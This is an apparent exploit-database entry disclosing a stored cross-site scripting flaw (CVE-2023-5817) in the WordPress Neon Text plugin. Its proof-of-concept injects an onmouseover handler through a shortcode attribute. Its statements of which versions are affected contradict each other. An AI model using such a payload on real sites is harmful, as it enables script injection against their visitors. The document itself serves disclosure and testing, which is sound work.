# Exploit Title: Wordpress Plugin Neon Text <= 1.1 - Stored Cross Site Scripting (XSS) # Date: 2023-11-15 # Exploit Author: Eren Car # Vendor Homepage: https://www.eralion.com/ # Software Link: https://downloads.wordpress.org/plugin/neon-text.zip # Category: Web Application # Version: 1.0 # Tested on: Debian / WordPress 6.4.1 # CVE : CVE-2023-5817 # 1. Description: The Neon text plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's neontext_box shortcode in 1.1 and above versions. # 2. Proof of Concept (PoC): a. Install and activate version 1.0 of the plugin. b. Go to the posts page and create new post. c. Add shorcode block and insert the following payload: [neontext_box][neontext color='"onmouseover="alert(document.domain)"']TEST[/neontext][/neontext_box] d. Save the changes and preview the page. Popup window demonstrating the vulnerability will be executed.
Credits and Partners
All rights reserved nPulse.net 2009 - 2024
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD
